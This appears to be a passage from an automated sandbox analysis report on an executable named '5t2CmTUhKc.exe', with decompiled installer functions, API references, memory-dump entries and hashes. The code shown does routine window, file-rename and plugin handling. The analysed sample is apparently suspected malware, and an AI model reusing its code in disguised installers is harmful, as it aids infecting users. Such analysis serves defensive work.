						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					 *((intOrPtr*)(_t102 + 4)) =  *0x423ea8;
				}
				return DefWindowProcA(_a4, _a8, _a12, _t102);
			}













                                                                                                            0x0040100a
                                                                                                            0x00401039
                                                                                                            0x00401047
                                                                                                            0x0040104d
                                                                                                            0x00401051
                                                                                                            0x0040105b
                                                                                                            0x00401061
                                                                                                            0x00401064
                                                                                                            0x004010f3
                                                                                                            0x00401089
                                                                                                            0x0040108c
                                                                                                            0x004010a6
                                                                                                            0x004010bd
                                                                                                            0x004010cc
                                                                                                            0x004010cf
                                                                                                            0x004010d5
                                                                                                            0x004010d9
                                                                                                            0x004010e4
                                                                                                            0x004010ed
                                                                                                            0x004010ef
                                                                                                            0x004010ef
                                                                                                            0x00401100
                                                                                                            0x00401105
                                                                                                            0x0040110d
                                                                                                            0x00401110
                                                                                                            0x00401112
                                                                                                            0x00401118
                                                                                                            0x0040111f
                                                                                                            0x00401126
                                                                                                            0x00401130
                                                                                                            0x00401142
                                                                                                            0x00401156
                                                                                                            0x00401160
                                                                                                            0x00401165
                                                                                                            0x00401165
                                                                                                            0x00401110
                                                                                                            0x0040116e
                                                                                                            0x00000000
                                                                                                            0x00401178
                                                                                                            0x00401010
                                                                                                            0x00401013
                                                                                                            0x00401015
                                                                                                            0x0040101f
                                                                                                            0x0040101f
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                            • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                            • GetClientRect.USER32 ref: 0040105B
                                                                                                            • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                            • FillRect.USER32 ref: 004010E4
                                                                                                            • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                            • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                                                                            • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                            • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                            • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                            • DrawTextA.USER32(00000000,004236A0,000000FF,00000010,00000820), ref: 00401156
                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                            • DeleteObject.GDI32(?), ref: 00401165
                                                                                                            • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.341219555.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.341191380.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341243931.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341257796.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341352308.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341409898.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341500620.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                            • String ID: F
                                                                                                            • API String ID: 941294808-1304234792
                                                                                                            • Opcode ID: 1fa3053a276be56ef7da5d68adfba1d9971bfb9fa2beb597bf2db4fb963a824d
                                                                                                            • Instruction ID: 81477e3a2fde3fb3f26aa953fc06e347994717d76cab2c79682594c458f31f57
                                                                                                            • Opcode Fuzzy Hash: 1fa3053a276be56ef7da5d68adfba1d9971bfb9fa2beb597bf2db4fb963a824d
                                                                                                            • Instruction Fuzzy Hash: 8141BC71804249AFCB058FA4CD459BFBFB9FF44314F00802AF551AA1A0C378EA54DFA5
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 004058B4, Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 144filememoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 93%
                                                                                                            			E004058B4() {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t15;
				long _t16;
				int _t20;
				void* _t28;
				long _t29;
				intOrPtr* _t37;
				int _t43;
				void* _t44;
				long _t47;
				CHAR* _t49;
				void* _t51;
				void* _t53;
				intOrPtr* _t54;
				void* _t55;
				void* _t56;

				_t15 = E00405E88(1);
				_t49 =  *(_t55 + 0x18);
				if(_t15 != 0) {
					_t20 =  *_t15( *(_t55 + 0x1c), _t49, 5);
					if(_t20 != 0) {
						L16:
						 *0x423f30 =  *0x423f30 + 1;
						return _t20;
					}
				}
				 *0x422630 = 0x4c554e;
				if(_t49 == 0) {
					L5:
					_t16 = GetShortPathNameA( *(_t55 + 0x1c), 0x4220a8, 0x400);
					if(_t16 != 0 && _t16 <= 0x400) {
						_t43 = wsprintfA(0x421ca8, "%s=%s\r\n", 0x422630, 0x4220a8);
						_t56 = _t55 + 0x10;
						E00405B88(_t43, 0x400, 0x4220a8, 0x4220a8,  *((intOrPtr*)( *0x423eb0 + 0x128)));
						_t20 = E0040583D(0x4220a8, 0xc0000000, 4);
						_t53 = _t20;
						 *(_t56 + 0x14) = _t53;
						if(_t53 == 0xffffffff) {
							goto L16;
						}
						_t47 = GetFileSize(_t53, 0);
						_t7 = _t43 + 0xa; // 0xa
						_t51 = GlobalAlloc(0x40, _t47 + _t7);
						if(_t51 == 0 || ReadFile(_t53, _t51, _t47, _t56 + 0x18, 0) == 0 || _t47 !=  *(_t56 + 0x18)) {
							L15:
							_t20 = CloseHandle(_t53);
							goto L16;
						} else {
							if(E004057B2(_t51, "[Rename]\r\n") != 0) {
								_t28 = E004057B2(_t26 + 0xa, 0x409350);
								if(_t28 == 0) {
									L13:
									_t29 = _t47;
									L14:
									E004057FE(_t51 + _t29, 0x421ca8, _t43);
									SetFilePointer(_t53, 0, 0, 0);
									WriteFile(_t53, _t51, _t47 + _t43, _t56 + 0x18, 0);
									GlobalFree(_t51);
									goto L15;
								}
								_t37 = _t28 + 1;
								_t44 = _t51 + _t47;
								_t54 = _t37;
								if(_t37 >= _t44) {
									L21:
									_t53 =  *(_t56 + 0x14);
									_t29 = _t37 - _t51;
									goto L14;
								} else {
									goto L20;
								}
								do {
									L20:
									 *((char*)(_t43 + _t54)) =  *_t54;
									_t54 = _t54 + 1;
								} while (_t54 < _t44);
								goto L21;
							}
							E00405B66(_t51 + _t47, "[Rename]\r\n");
							_t47 = _t47 + 0xa;
							goto L13;
						}
					}
				} else {
					CloseHandle(E0040583D(_t49, 0, 1));
					_t16 = GetShortPathNameA(_t49, 0x422630, 0x400);
					if(_t16 != 0 && _t16 <= 0x400) {
						goto L5;
					}
				}
				return _t16;
			}





















                                                                                                            0x004058ba
                                                                                                            0x004058c1
                                                                                                            0x004058c5
                                                                                                            0x004058ce
                                                                                                            0x004058d2
                                                                                                            0x00405a11
                                                                                                            0x00405a11
                                                                                                            0x00000000
                                                                                                            0x00405a11
                                                                                                            0x004058d2
                                                                                                            0x004058de
                                                                                                            0x004058f4
                                                                                                            0x0040591c
                                                                                                            0x00405927
                                                                                                            0x0040592b
                                                                                                            0x0040594b
                                                                                                            0x00405952
                                                                                                            0x0040595c
                                                                                                            0x00405969
                                                                                                            0x0040596e
                                                                                                            0x00405973
                                                                                                            0x00405977
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00405986
                                                                                                            0x00405988
                                                                                                            0x00405995
                                                                                                            0x00405999
                                                                                                            0x00405a0a
                                                                                                            0x00405a0b
                                                                                                            0x00000000
                                                                                                            0x004059b5
                                                                                                            0x004059c2
                                                                                                            0x00405a27
                                                                                                            0x00405a2e
                                                                                                            0x004059d5
                                                                                                            0x004059d5
                                                                                                            0x004059d7
                                                                                                            0x004059e0
                                                                                                            0x004059eb
                                                                                                            0x004059fd
                                                                                                            0x00405a04
                                                                                                            0x00000000
                                                                                                            0x00405a04
                                                                                                            0x00405a30
                                                                                                            0x00405a31
                                                                                                            0x00405a36
                                                                                                            0x00405a38
                                                                                                            0x00405a45
                                                                                                            0x00405a45
                                                                                                            0x00405a49
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00405a3a
                                                                                                            0x00405a3a
                                                                                                            0x00405a3d
                                                                                                            0x00405a40
                                                                                                            0x00405a41
                                                                                                            0x00000000
                                                                                                            0x00405a3a
                                                                                                            0x004059cd
                                                                                                            0x004059d2
                                                                                                            0x00000000
                                                                                                            0x004059d2
                                                                                                            0x00405999
                                                                                                            0x004058f6
                                                                                                            0x00405901
                                                                                                            0x0040590a
                                                                                                            0x0040590e
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x0040590e
                                                                                                            0x00405a1b

                                                                                                            APIs
                                                                                                              • Part of subcall function 00405E88: GetModuleHandleA.KERNEL32(?,?,00000000,0040327F,00000008), ref: 00405E9A
                                                                                                              • Part of subcall function 00405E88: LoadLibraryA.KERNELBASE(?,?,00000000,0040327F,00000008), ref: 00405EA5
                                                                                                              • Part of subcall function 00405E88: GetProcAddress.KERNEL32(00000000,?), ref: 00405EB6
                                                                                                            • CloseHandle.KERNEL32(00000000,?,00000000,00000001,00000001,?,00000000,?,?,00405649,?,00000000,000000F1,?), ref: 00405901
                                                                                                            • GetShortPathNameA.KERNEL32 ref: 0040590A
                                                                                                            • GetShortPathNameA.KERNEL32 ref: 00405927
                                                                                                            • wsprintfA.USER32 ref: 00405945
                                                                                                            • GetFileSize.KERNEL32(00000000,00000000,004220A8,C0000000,00000004,004220A8,?,?,?,00000000,000000F1,?), ref: 00405980
                                                                                                            • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,00000000,000000F1,?), ref: 0040598F
                                                                                                            • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,000000F1,?), ref: 004059A5
                                                                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,00421CA8,00000000,-0000000A,00409350,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004059EB
                                                                                                            • WriteFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000000,000000F1,?), ref: 004059FD
                                                                                                            • GlobalFree.KERNEL32 ref: 00405A04
                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,00000000,000000F1,?), ref: 00405A0B
                                                                                                              • Part of subcall function 004057B2: lstrlenA.KERNEL32(00000000,?,00000000,00000000,004059C0,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004057B9
                                                                                                              • Part of subcall function 004057B2: lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,004059C0,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004057E9
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.341219555.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.341191380.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341243931.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341257796.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341352308.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341409898.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341500620.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: File$Handle$CloseGlobalNamePathShortlstrlen$AddressAllocFreeLibraryLoadModulePointerProcReadSizeWritewsprintf
                                                                                                            • String ID: %s=%s$0&B$[Rename]
                                                                                                            • API String ID: 3772915668-951905037
                                                                                                            • Opcode ID: 0c179fa3417d280b53e5d95a4378c92fb06f2b6e7dc6de3d5fc3f6893b1dd3a2
                                                                                                            • Instruction ID: 8912a0e40cac8f66f34925055924fb713260e7a12edb00ecfb1cfbef244c1689
                                                                                                            • Opcode Fuzzy Hash: 0c179fa3417d280b53e5d95a4378c92fb06f2b6e7dc6de3d5fc3f6893b1dd3a2
                                                                                                            • Instruction Fuzzy Hash: D9411332B05B11BBD3216B61AD88F6B3A5CDB84715F140136FE05F22C2E678A801CEBD
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 736124D8, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 124COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 89%
                                                                                                            			E736124D8(intOrPtr* _a4) {
				char _v80;
				int _v84;
				intOrPtr _v88;
				short _v92;
				intOrPtr* _t28;
				void* _t30;
				intOrPtr _t31;
				signed int _t43;
				void* _t44;
				intOrPtr _t45;
				void* _t48;

				_t44 = E73611215();
				_t28 = _a4;
				_t45 =  *((intOrPtr*)(_t28 + 0x814));
				_v88 = _t45;
				_t48 = (_t45 + 0x41 << 5) + _t28;
				do {
					if( *((intOrPtr*)(_t48 - 4)) >= 0) {
					}
					_t43 =  *(_t48 - 8) & 0x000000ff;
					if(_t43 <= 7) {
						switch( *((intOrPtr*)(_t43 * 4 +  &M73612626))) {
							case 0:
								 *_t44 = 0;
								goto L17;
							case 1:
								__eax =  *__eax;
								if(__ecx > __ebx) {
									_v84 = __ecx;
									__ecx =  *(0x7361307c + __edx * 4);
									__edx = _v84;
									__ecx = __ecx * __edx;
									asm("sbb edx, edx");
									__edx = __edx & __ecx;
									__eax = __eax &  *(0x7361309c + __edx * 4);
								}
								_push(__eax);
								goto L15;
							case 2:
								__eax = E73611429(__edx,  *__eax,  *((intOrPtr*)(__eax + 4)), __edi);
								goto L16;
							case 3:
								__eax = lstrcpynA(__edi,  *__eax,  *0x7361405c);
								goto L17;
							case 4:
								__ecx =  *0x7361405c;
								__edx = __ecx - 1;
								__eax = WideCharToMultiByte(__ebx, __ebx,  *__eax, __ecx, __edi, __edx, __ebx, __ebx);
								__eax =  *0x7361405c;
								 *((char*)(__eax + __edi - 1)) = __bl;
								goto L17;
							case 5:
								__ecx =  &_v80;
								_push(0x27);
								_push(__ecx);
								_push( *__eax);
								" {*v@u*v"();
								__eax =  &_v92;
								__eax = WideCharToMultiByte(__ebx, __ebx,  &_v92,  &_v92, __edi,  *0x7361405c, __ebx, __ebx);
								goto L17;
							case 6:
								_push( *__esi);
								L15:
								__eax = wsprintfA(__edi, 0x73614000);
								L16:
								__esp = __esp + 0xc;
								goto L17;
						}
					}
					L17:
					_t30 =  *(_t48 + 0x14);
					if(_t30 != 0 && ( *_a4 != 2 ||  *((intOrPtr*)(_t48 - 4)) > 0)) {
						GlobalFree(_t30);
					}
					_t31 =  *((intOrPtr*)(_t48 + 0xc));
					if(_t31 != 0) {
						if(_t31 != 0xffffffff) {
							if(_t31 > 0) {
								E736112D1(_t31 - 1, _t44);
								goto L26;
							}
						} else {
							E73611266(_t44);
							L26:
						}
					}
					_v88 = _v88 - 1;
					_t48 = _t48 - 0x20;
				} while (_v88 >= 0);
				return GlobalFree(_t44);
			}














                                                                                                            0x736124e4
                                                                                                            0x736124e6
                                                                                                            0x736124f0
                                                                                                            0x736124f6
                                                                                                            0x73612500
                                                                                                            0x73612504
                                                                                                            0x73612509
                                                                                                            0x73612509
                                                                                                            0x73612511
                                                                                                            0x73612518
                                                                                                            0x7361251e
                                                                                                            0x00000000
                                                                                                            0x73612525
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x7361252c
                                                                                                            0x73612530
                                                                                                            0x73612533
                                                                                                            0x73612537
                                                                                                            0x7361253e
                                                                                                            0x73612542
                                                                                                            0x73612548
                                                                                                            0x7361254a
                                                                                                            0x7361254c
                                                                                                            0x7361254c
                                                                                                            0x73612553
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x7361255c
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x7361256c
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x73612598
                                                                                                            0x736125a0
                                                                                                            0x736125aa
                                                                                                            0x736125ac
                                                                                                            0x736125b1
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x73612574
                                                                                                            0x73612578
                                                                                                            0x7361257a
                                                                                                            0x7361257b
                                                                                                            0x7361257d
                                                                                                            0x7361258d
                                                                                                            0x73612594
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x736125b7
                                                                                                            0x736125b9
                                                                                                            0x736125bf
                                                                                                            0x736125c5
                                                                                                            0x736125c5
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x7361251e
                                                                                                            0x736125c8
                                                                                                            0x736125c8
                                                                                                            0x736125cd
                                                                                                            0x736125de
                                                                                                            0x736125de
                                                                                                            0x736125e4
                                                                                                            0x736125e9
                                                                                                            0x736125ee
                                                                                                            0x736125fa
                                                                                                            0x736125ff
                                                                                                            0x00000000
                                                                                                            0x73612604
                                                                                                            0x736125f0
                                                                                                            0x736125f1
                                                                                                            0x73612605
                                                                                                            0x73612605
                                                                                                            0x736125ee
                                                                                                            0x73612606
                                                                                                            0x7361260a
                                                                                                            0x7361260d
                                                                                                            0x73612625

                                                                                                            APIs
                                                                                                              • Part of subcall function 73611215: GlobalAlloc.KERNELBASE(00000040,73611233,?,736112CF,-7361404B,736111AB,-000000A0), ref: 7361121D
                                                                                                            • GlobalFree.KERNEL32 ref: 736125DE
                                                                                                            • GlobalFree.KERNEL32 ref: 73612618
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.344646038.0000000073611000.00000020.00020000.sdmp, Offset: 73610000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.344639568.0000000073610000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.344652091.0000000073613000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.344660536.0000000073615000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: Global$Free$Alloc
                                                                                                            • String ID: {*v@u*v
                                                                                                            • API String ID: 1780285237-3183337590
                                                                                                            • Opcode ID: 4f057464a0f717fc6822ee75f3e1f8a4a55d67129804b4d5ec6f3833d933eefc
                                                                                                            • Instruction ID: b4c44f67a1434f7b34f1046552c0217f252a2264f78738a684053d8a1c27e867
                                                                                                            • Opcode Fuzzy Hash: 4f057464a0f717fc6822ee75f3e1f8a4a55d67129804b4d5ec6f3833d933eefc
                                                                                                            • Instruction Fuzzy Hash: F241FF7210420AEFD702DF55CCD8E2ABBFFEB85701B24452EF54697288DB31A824CB61
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 736122F1, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 140memoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 86%
                                                                                                            			E736122F1(void* __edx, intOrPtr _a4) {
				signed int _v4;
				signed int _v8;
				void* _t38;
				signed int _t39;
				void* _t40;
				void* _t43;
				void* _t48;
				signed int* _t50;
				signed char* _t51;

				_v8 = 0 |  *((intOrPtr*)(_a4 + 0x814)) > 0x00000000;
				while(1) {
					_t9 = _a4 + 0x818; // 0x818
					_t51 = (_v8 << 5) + _t9;
					_t38 = _t51[0x18];
					if(_t38 == 0) {
						goto L9;
					}
					_t48 = 0x1a;
					if(_t38 == _t48) {
						goto L9;
					}
					if(_t38 != 0xffffffff) {
						if(_t38 <= 0 || _t38 > 0x19) {
							_t51[0x18] = _t48;
						} else {
							_t38 = E736112AD(_t38 - 1);
							L10:
						}
						goto L11;
					} else {
						_t38 = E7361123B();
						L11:
						_t43 = _t38;
						_t13 =  &(_t51[8]); // 0x820
						_t50 = _t13;
						if(_t51[4] >= 0) {
						}
						_t39 =  *_t51 & 0x000000ff;
						_t51[0x1c] = _t51[0x1c] & 0x00000000;
						_v4 = _t39;
						if(_t39 > 7) {
							L27:
							_t40 = GlobalFree(_t43);
							if(_v8 == 0) {
								return _t40;
							}
							if(_v8 !=  *((intOrPtr*)(_a4 + 0x814))) {
								_v8 = _v8 + 1;
							} else {
								_v8 = _v8 & 0x00000000;
							}
							continue;
						} else {
							switch( *((intOrPtr*)(_t39 * 4 +  &M7361247E))) {
								case 0:
									 *_t50 =  *_t50 & 0x00000000;
									goto L27;
								case 1:
									__eax = E736112FE(__ebx);
									goto L20;
								case 2:
									 *__ebp = E736112FE(__ebx);
									_a4 = __edx;
									goto L27;
								case 3:
									__eax = E73611224(__ebx);
									 *(__esi + 0x1c) = __eax;
									L20:
									 *__ebp = __eax;
									goto L27;
								case 4:
									 *0x7361405c =  *0x7361405c +  *0x7361405c;
									__edi = GlobalAlloc(0x40,  *0x7361405c +  *0x7361405c);
									 *0x7361405c = MultiByteToWideChar(0, 0, __ebx,  *0x7361405c, __edi,  *0x7361405c);
									if(_v4 != 5) {
										 *(__esi + 0x1c) = __edi;
										 *__ebp = __edi;
									} else {
										__eax = GlobalAlloc(0x40, 0x10);
										_push(__eax);
										 *(__esi + 0x1c) = __eax;
										_push(__edi);
										 *__ebp = __eax;
										__imp__CLSIDFromString();
										__eax = GlobalFree(__edi);
									}
									goto L27;
								case 5:
									if( *__ebx != 0) {
										__eax = E736112FE(__ebx);
										 *__edi = __eax;
									}
									goto L27;
								case 6:
									__esi =  *(__esi + 0x18);
									__esi = __esi - 1;
									__esi = __esi *  *0x7361405c;
									__esi = __esi +  *0x73614064;
									__eax = __esi + 0xc;
									 *__edi = __esi + 0xc;
									asm("cdq");
									__eax = E73611429(__edx, __esi + 0xc, __edx, __esi);
									goto L27;
							}
						}
					}
					L9:
					_t38 = E73611224(0x73614034);
					goto L10;
				}
			}












                                                                                                            0x73612306
                                                                                                            0x7361230a
                                                                                                            0x73612315
                                                                                                            0x73612315
                                                                                                            0x7361231c
                                                                                                            0x73612321
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x73612325
                                                                                                            0x73612328
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x7361232d
                                                                                                            0x73612338
                                                                                                            0x73612348
                                                                                                            0x7361233f
                                                                                                            0x73612341
                                                                                                            0x73612357
                                                                                                            0x73612357
                                                                                                            0x00000000
                                                                                                            0x7361232f
                                                                                                            0x7361232f
                                                                                                            0x73612358
                                                                                                            0x7361235c
                                                                                                            0x7361235e
                                                                                                            0x7361235e
                                                                                                            0x73612361
                                                                                                            0x73612361
                                                                                                            0x73612369
                                                                                                            0x7361236c
                                                                                                            0x73612373
                                                                                                            0x73612377
                                                                                                            0x73612446
                                                                                                            0x73612447
                                                                                                            0x73612452
                                                                                                            0x7361247d
                                                                                                            0x7361247d
                                                                                                            0x73612462
                                                                                                            0x7361246e
                                                                                                            0x73612464
                                                                                                            0x73612464
                                                                                                            0x73612464
                                                                                                            0x00000000
                                                                                                            0x7361237d
                                                                                                            0x7361237d
                                                                                                            0x00000000
                                                                                                            0x73612384
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x7361238d
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x7361239b
                                                                                                            0x7361239e
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x736123a7
                                                                                                            0x736123ac
                                                                                                            0x736123af
                                                                                                            0x736123b0
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x736123bd
                                                                                                            0x736123c8
                                                                                                            0x736123d7
                                                                                                            0x736123e2
                                                                                                            0x73612405
                                                                                                            0x73612408
                                                                                                            0x736123e4
                                                                                                            0x736123e8
                                                                                                            0x736123ee
                                                                                                            0x736123ef
                                                                                                            0x736123f2
                                                                                                            0x736123f3
                                                                                                            0x736123f6
                                                                                                            0x736123fd
                                                                                                            0x736123fd
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x73612410
                                                                                                            0x73612413
                                                                                                            0x7361241f
                                                                                                            0x73612421
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x73612424
                                                                                                            0x73612427
                                                                                                            0x73612428
                                                                                                            0x7361242f
                                                                                                            0x73612436
                                                                                                            0x73612439
                                                                                                            0x7361243b
                                                                                                            0x7361243e
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x7361237d
                                                                                                            0x73612377
                                                                                                            0x7361234d
                                                                                                            0x73612352
                                                                                                            0x00000000
                                                                                                            0x73612352

                                                                                                            APIs
                                                                                                            • GlobalFree.KERNEL32 ref: 73612447
                                                                                                              • Part of subcall function 73611224: lstrcpynA.KERNEL32(00000000,?,736112CF,-7361404B,736111AB,-000000A0), ref: 73611234
                                                                                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 736123C2
                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 736123D7
                                                                                                            • GlobalAlloc.KERNEL32(00000040,00000010), ref: 736123E8
                                                                                                            • CLSIDFromString.OLE32(00000000,00000000), ref: 736123F6
                                                                                                            • GlobalFree.KERNEL32 ref: 736123FD
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.344646038.0000000073611000.00000020.00020000.sdmp, Offset: 73610000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.344639568.0000000073610000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.344652091.0000000073613000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.344660536.0000000073615000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: Global$AllocFree$ByteCharFromMultiStringWidelstrcpyn
                                                                                                            • String ID: @u*v
                                                                                                            • API String ID: 3730416702-1046951355
                                                                                                            • Opcode ID: 375c213e27045f94ff7045dae55d01df0cf07e6cd1eac2e0259369190d32cdc8
                                                                                                            • Instruction ID: 3a63b9d794b3061054e85df47165f00967f7b847f8ddce285f678c7f05909f46
                                                                                                            • Opcode Fuzzy Hash: 375c213e27045f94ff7045dae55d01df0cf07e6cd1eac2e0259369190d32cdc8
                                                                                                            • Instruction Fuzzy Hash: 2A41BEB250438ADFE311DF61D948B2AB7FAFB40311F20492AF48ACB1D4E7309564CB65
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00405DC8, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E00405DC8(CHAR* _a4) {
				char _t5;
				char _t7;
				char* _t15;
				char* _t16;
				CHAR* _t17;

				_t17 = _a4;
				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
					_t17 =  &(_t17[4]);
				}
				if( *_t17 != 0 && E004056C6(_t17) != 0) {
					_t17 =  &(_t17[2]);
				}
				_t5 =  *_t17;
				_t15 = _t17;
				_t16 = _t17;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((char*)(E00405684("*?|<>/\":", _t5))) == 0) {
							E004057FE(_t16, _t17, CharNextA(_t17) - _t17);
							_t16 = CharNextA(_t16);
						}
						_t17 = CharNextA(_t17);
						_t5 =  *_t17;
					} while (_t5 != 0);
				}
				 *_t16 =  *_t16 & 0x00000000;
				while(1) {
					_t16 = CharPrevA(_t15, _t16);
					_t7 =  *_t16;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t16 =  *_t16 & 0x00000000;
					if(_t15 < _t16) {
						continue;
					}
					break;
				}
				return _t7;
			}








                                                                                                            0x00405dca
                                                                                                            0x00405dd2
                                                                                                            0x00405de6
                                                                                                            0x00405de6
                                                                                                            0x00405dec
                                                                                                            0x00405df9
                                                                                                            0x00405df9
                                                                                                            0x00405dfa
                                                                                                            0x00405dfc
                                                                                                            0x00405e00
                                                                                                            0x00405e02
                                                                                                            0x00405e0b
                                                                                                            0x00405e0d
                                                                                                            0x00405e27
                                                                                                            0x00405e2f
                                                                                                            0x00405e2f
                                                                                                            0x00405e34
                                                                                                            0x00405e36
                                                                                                            0x00405e38
                                                                                                            0x00405e3c
                                                                                                            0x00405e3d
                                                                                                            0x00405e40
                                                                                                            0x00405e48
                                                                                                            0x00405e4a
                                                                                                            0x00405e4e
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00405e54
                                                                                                            0x00405e59
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00405e59
                                                                                                            0x00405e5e

                                                                                                            APIs
                                                                                                            • CharNextA.USER32(?,*?|<>/":,00000000,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\5t2CmTUhKc.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,00403214,C:\Users\user\AppData\Local\Temp\,00000000,00403386), ref: 00405E20
                                                                                                            • CharNextA.USER32(?,?,?,00000000), ref: 00405E2D
                                                                                                            • CharNextA.USER32(?,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\5t2CmTUhKc.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,00403214,C:\Users\user\AppData\Local\Temp\,00000000,00403386), ref: 00405E32
                                                                                                            • CharPrevA.USER32(?,?,"C:\Users\user\Desktop\5t2CmTUhKc.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,00403214,C:\Users\user\AppData\Local\Temp\,00000000,00403386), ref: 00405E42
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.341219555.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
